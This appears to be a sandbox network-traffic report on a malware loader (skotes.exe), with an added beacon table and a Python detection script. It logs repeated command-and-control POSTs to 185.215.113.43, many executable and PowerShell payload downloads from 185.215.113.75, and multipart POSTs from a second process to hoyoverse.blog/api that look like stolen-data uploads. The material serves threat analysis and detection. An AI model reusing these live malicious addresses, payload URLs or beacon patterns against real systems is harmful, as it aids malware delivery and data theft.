                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
  skotes.exe
  Remote address:
  185.215.113.43:80

  This record and the 15 that follow it are the same transaction repeated: skotes.exe POSTs a fixed 31-byte form-urlencoded body to http://185.215.113.43/Zu7JuNko/index.php (flag-ru) and gets an empty-looking chunked 200 back. Request and response headers are identical across all 16; only the response Date changes, so the headers are listed once and the per-request Date values are tabulated below. Check-ins arrive mostly 3 seconds apart (two longer gaps of 8 s and 7 s), which is the regular, fixed-size C2 beacon pattern a detection engineer should look for rather than the specific path or IP.

  Request (identical for all 16)
  POST /Zu7JuNko/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.43
  Content-Length: 31
  Cache-Control: no-cache

  Response (identical for all 16 apart from Date)
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 <time below> GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive

  #    Process      Method  Remote address      Response Date (Thu, 20 Feb 2025, GMT)   Gap since previous
  1    skotes.exe   POST    185.215.113.43:80   00:33:37                                 -
  2    skotes.exe   POST    185.215.113.43:80   00:33:40                                 3 s
  3    skotes.exe   POST    185.215.113.43:80   00:33:43                                 3 s
  4    skotes.exe   POST    185.215.113.43:80   00:33:45                                 2 s
  5    skotes.exe   POST    185.215.113.43:80   00:33:48                                 3 s
  6    skotes.exe   POST    185.215.113.43:80   00:33:51                                 3 s
  7    skotes.exe   POST    185.215.113.43:80   00:33:54                                 3 s
  8    skotes.exe   POST    185.215.113.43:80   00:33:56                                 2 s
  9    skotes.exe   POST    185.215.113.43:80   00:34:00                                 4 s
  10   skotes.exe   POST    185.215.113.43:80   00:34:03                                 3 s
  11   skotes.exe   POST    185.215.113.43:80   00:34:06                                 3 s
  12   skotes.exe   POST    185.215.113.43:80   00:34:09                                 3 s
  13   skotes.exe   POST    185.215.113.43:80   00:34:12                                 3 s
  14   skotes.exe   POST    185.215.113.43:80   00:34:20                                 8 s
  15   skotes.exe   POST    185.215.113.43:80   00:34:23                                 3 s
  16   skotes.exe   POST    185.215.113.43:80   00:34:30                                 7 s
                                                                                              GET
                                                                                              http://185.215.113.75/files/748049926/kdMujZh.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/748049926/kdMujZh.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:55 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1745920
                                                                                              Last-Modified: Wed, 19 Feb 2025 22:31:48 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b65bd4-1aa400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/teamex_support/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/teamex_support/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:59 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2087424
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:31:53 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b669e9-1fda00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/SQL_gulong1/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/SQL_gulong1/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:09 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1805824
                                                                                              Last-Modified: Sun, 16 Feb 2025 22:05:42 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b26136-1b8e00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/smirnov2626/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/smirnov2626/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:13 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1820672
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:12:31 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6655f-1bc800"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/martin1/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/martin1/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:18 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 6519808
                                                                                              Last-Modified: Thu, 20 Feb 2025 00:04:44 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6719c-637c00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/bonus_max/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/bonus_max/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:25 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2115072
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:08:43 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6647b-204600"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/5728215906/d2YQIJa.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/5728215906/d2YQIJa.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2049024
                                                                                              Last-Modified: Mon, 17 Feb 2025 17:56:09 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b37839-1f4400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/1760365699/f3Ypd8O.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/1760365699/f3Ypd8O.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:33 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 695808
                                                                                              Last-Modified: Wed, 19 Feb 2025 20:38:35 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6414b-a9e00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/5803047068/oKUl4yo.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/5803047068/oKUl4yo.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:36 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 162
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/7098980627/7aencsM.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/7098980627/7aencsM.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:38 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 278528
                                                                                              Last-Modified: Tue, 18 Feb 2025 14:27:06 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b498ba-44000"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/1506757897/tYliuwV.ps1
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/1506757897/tYliuwV.ps1 HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:40 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 902340
                                                                                              Last-Modified: Fri, 14 Feb 2025 09:03:17 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67af06d5-dc4c4"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/7708303768/9aiiMOQ.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/7708303768/9aiiMOQ.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:45 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 669184
                                                                                              Last-Modified: Wed, 19 Feb 2025 14:44:50 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b5ee62-a3600"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/osint1618/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/osint1618/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:48 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2058752
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:15:20 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66608-1f6a00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/5803047068/ymy1CwP.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/5803047068/ymy1CwP.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 248832
                                                                                              Last-Modified: Thu, 20 Feb 2025 00:20:36 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b67554-3cc00"
                                                                                              Accept-Ranges: bytes
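The entries above are what an analyst turns into blocklist entries and detection logic: a short form-encoded POST beacon from skotes.exe to /Zu7JuNko/index.php, followed by a run of GETs under /files/ on 185.215.113.75 answered with application/octet-stream (or 404 once a payload has been rotated out). The following is an added example, not part of the tria.ge report and not Amadey or tria.ge code. It parses a small sample constructed inline from three of the page's entries, flags the beacon-then-download pattern, and checks each nginx ETag against Last-Modified and Content-Length (nginx's default ETag is the file's mtime and size in hex, so a consistent pair both confirms the headers are genuine and lets the same file be recognised when it is served under different paths). The function names `parse_log`, `nginx_etag_consistent` and `amadey_indicators` and the sample layout are this example's own.

```python
"""Added example (not tria.ge code): parse the page's HTTP entries, flag loader behaviour, check nginx ETags."""
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed sample: three entries from this page, trimmed to the headers used below.
SAMPLE_LOG = """\
• [RU] POST http://185.215.113.43/Zu7JuNko/index.php (skotes.exe)
  Request
  POST /Zu7JuNko/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.43
  Content-Length: 31
  Response
  HTTP/1.1 200 OK
  Content-Type: text/html; charset=UTF-8
• [RU] GET http://185.215.113.75/files/748049926/kdMujZh.exe (skotes.exe)
  Request
  GET /files/748049926/kdMujZh.exe HTTP/1.1
  Host: 185.215.113.75
  Response
  HTTP/1.1 200 OK
  Content-Type: application/octet-stream
  Content-Length: 1745920
  Last-Modified: Wed, 19 Feb 2025 22:31:48 GMT
  ETag: "67b65bd4-1aa400"
• [RU] GET http://185.215.113.75/files/5803047068/oKUl4yo.exe (skotes.exe)
  Request
  GET /files/5803047068/oKUl4yo.exe HTTP/1.1
  Host: 185.215.113.75
  Response
  HTTP/1.1 404 Not Found
  Content-Type: text/html
  Content-Length: 162
"""
ENTRY_RE = re.compile(r"^• \[(\w+)\] (\w+) (\S+) \((.+)\)$")
HEADER_RE = re.compile(r"^([A-Za-z-]+):\s*(.*)$")

def parse_log(text):
    """One dict per entry: geo, method, url, process, status, req/resp header maps."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = ENTRY_RE.match(line)
        if m:
            cur = {"geo": m[1], "method": m[2], "url": m[3], "process": m[4],
                   "status": None, "req": {}, "resp": {}}
            entries.append(cur)
            section = None
        elif cur is None:
            continue
        elif line in ("Request", "Response"):
            section = "req" if line == "Request" else "resp"
        elif line.startswith("HTTP/"):
            cur["status"] = int(line.split()[1])
        elif section and HEADER_RE.match(line):
            name, value = HEADER_RE.match(line).groups()
            cur[section][name.lower()] = value
    return entries

def nginx_etag_consistent(resp):
    """nginx's default ETag is hex(mtime)-hex(size); agreement with Last-Modified and
    Content-Length confirms the listing is genuine, and the ETag alone then matches
    the same file served under different paths. Returns None when there is no ETag."""
    etag = resp.get("etag", "").strip('"')
    if "-" not in etag or "last-modified" not in resp:
        return None
    mtime_hex, size_hex = etag.split("-", 1)
    mtime = datetime.fromtimestamp(int(mtime_hex, 16), tz=timezone.utc)
    return (mtime == parsedate_to_datetime(resp["last-modified"])
            and int(size_hex, 16) == int(resp["content-length"]))

def amadey_indicators(entries):
    """Loader pattern seen on this page: a short form-encoded POST to .../index.php
    (beacon), then GETs under /files/ answered with application/octet-stream
    (payload) or 404 (file no longer present on the server)."""
    findings = []
    for e in entries:
        req, resp = e["req"], e["resp"]
        if (e["method"] == "POST" and e["url"].endswith("/index.php")
                and req.get("content-type", "").startswith("application/x-www-form-urlencoded")
                and int(req.get("content-length", "0")) < 64):
            findings.append(("c2_beacon", e["url"]))
        elif e["method"] == "GET" and "/files/" in e["url"]:
            if resp.get("content-type") == "application/octet-stream":
                findings.append(("payload_download", e["url"]))
            elif e["status"] == 404:
                findings.append(("payload_missing", e["url"]))
    return findings

if __name__ == "__main__":
    ents = parse_log(SAMPLE_LOG)
    print(amadey_indicators(ents), nginx_etag_consistent(ents[1]["resp"]))
```

Run against the full listing, the ETag check passes for every 200 response on this page (for example "67b65bd4-1aa400" decodes to 2025-02-19 22:31:48 UTC and 1745920 bytes, exactly the Last-Modified and Content-Length served for kdMujZh.exe), which is also why two paths with the same ETag can be treated as one payload without downloading either.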
• [RU] GET http://185.215.113.75/files/ReverseSheller/random.exe (skotes.exe)
  Remote address: 185.215.113.75:80
  Request
  GET /files/ReverseSheller/random.exe HTTP/1.1
  Host: 185.215.113.75
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:34:12 GMT
  Content-Type: application/octet-stream
  Content-Length: 10302976
  Last-Modified: Fri, 24 Jan 2025 18:07:34 GMT
  Connection: keep-alive
  ETag: "6793d6e6-9d3600"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/asjduwgsgausi/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/asjduwgsgausi/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:20 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 332800
                                                                                              Last-Modified: Fri, 07 Feb 2025 04:36:30 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67a58dce-51400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/martin2/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/martin2/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:23 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 4747776
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:12:26 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6655a-487200"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/5996006993/dzvh4HC.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/5996006993/dzvh4HC.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:30 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 18855936
                                                                                              Last-Modified: Wed, 19 Feb 2025 10:37:07 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b5b453-11fb800"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fruitfuvljourney.tech
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fruitfuvljourney.tech
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              nestlecompany.world
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              nestlecompany.world
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              hoyoverse.blog
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              Response
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.96.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.48.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.64.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.16.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.112.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.32.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.80.1
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cumYYlK5GIogxDudZnHjzKY%2BLQVgSAr5CzIjlYqLxc4POEIQ1a60tvpPZ7%2BatZkX2VXaKgZk3gzt7tpISXX2E1ROJH5aFhe7i30NByNG6tfsc9%2FS8wJCjjr3OrJmnmRyAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a672638d1cd72-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=feSzxHS.VL9WnxnG7FgjHFUG3.VjhEgwpfVsAiRwzac-1740011582-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 53
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=no9kvuoq23jf0fe8inb7lfr76o; expires=Fri, 21 Feb 2025 00:33:02 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3gOxvl7t32X%2FO0pjf2BdW%2FrAHVm57oIwIL4nvWMVXxDEqhIs4inHWwKRshHAGfna2R5zsHEX1NopUd8%2Bjkezei9tbErWdsQhM9TdT4o9Ev5xTq1R1fJxVD%2BhB%2B8tM9pr8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6726896ecd72-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=50826&min_rtt=42063&rtt_var=12807&sent=14&recv=13&lost=0&retrans=0&sent_bytes=8557&recv_bytes=1063&delivery_rate=194516&cwnd=257&unsent_bytes=0&cid=864b3fd3787df9ca&ts=454&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=2DSYXPNQUYXLU3
                                                                                              Cookie: __cf_mw_byp=feSzxHS.VL9WnxnG7FgjHFUG3.VjhEgwpfVsAiRwzac-1740011582-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1586
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=svtn9qtg8ujrk9r328l3o146nt; expires=Fri, 21 Feb 2025 00:33:02 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=byN6utRvyJCVtOeMEBECkB29vOl%2FyxKtO8cXQ2Q30sDw7eKSJfyKCfT5C7skfFA2BcenR6N16hNHyetSrRK149buQLI4g7flg2Cq1CScADWliRdXUqD2grFGnN%2BjO2P%2BMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67287d3ccd72-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=50138&min_rtt=42063&rtt_var=10980&sent=18&recv=17&lost=0&retrans=0&sent_bytes=9733&recv_bytes=3071&delivery_rate=194516&cwnd=257&unsent_bytes=0&cid=864b3fd3787df9ca&ts=683&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=0P4RCPCKDN
                                                                                              Cookie: __cf_mw_byp=feSzxHS.VL9WnxnG7FgjHFUG3.VjhEgwpfVsAiRwzac-1740011582-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1074
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:04 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
